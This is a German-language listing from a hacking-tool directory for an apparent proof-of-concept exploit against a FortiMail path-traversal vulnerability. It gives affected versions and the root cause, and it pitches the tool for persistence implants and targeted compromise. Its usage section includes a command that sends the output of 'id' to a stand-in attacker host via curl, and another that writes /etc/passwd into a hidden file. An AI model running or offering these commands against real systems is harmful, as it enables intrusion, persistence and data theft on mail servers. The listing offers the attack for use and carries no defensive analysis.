Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-104286-POC — Unauthentifizierter Path-Traversal-Exploit für CVE-2026-104286 in FortiMail, der beliebige Dateien über manipulierte HTTP/HTTPS-Anfragen für Red-Team-Bewertung und Persistenz schreibt. | Kitploit
Tools/GitHubGitHub/shadowforge-cyber/cve-2026-104286-poc
PersistenzmechanismenSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
shadowforge-cyber/cve-2026-104286-poc

CVE-2026-104286-POC

Unauthentifizierter Path-Traversal-Exploit für CVE-2026-104286 in FortiMail, der beliebige Dateien über manipulierte HTTP/HTTPS-Anfragen für Red-Team-Bewertung und Persistenz schreibt.

Repository anzeigen
vor 1 TagNoch nicht geprüft
Teilen

FortiMail CVE-2026-104286 Path-Traversal-Exploit

Überblick

Fortgeschrittener nicht authentifizierter Remote-Exploit zum willkürlichen Schreiben beliebiger Dateien für CVE-2026-104286 in FortiMail. Speziell präparierte HTTP/HTTPS-Anfragen umgehen die Pfadbereinigung im Web-Client und ermöglichen das Erstellen beliebiger Dateien auf dem zugrunde liegenden Betriebssystem. Wird für Red-Team-Bewertungen, Persistenz-Implantate und gezielte Kompromittierung von FortiMail-Installationen verwendet.

Betroffene Versionen

FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)

Ursache

Unzureichende Einschränkung eines Pfadnamens auf ein eingeschränktes Verzeichnis (CWE-22). Keine Validierung von ../-Sequenzen in Datei-Upload-Pfaden innerhalb der HTTP/HTTPS-API-Handler, was eine Traversierung außerhalb des vorgesehenen Upload-Verzeichnisses ermöglicht.

Verwendung

$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
image

Exploit

Kontakt für den Exploit: [email protected]

Tool herunterladen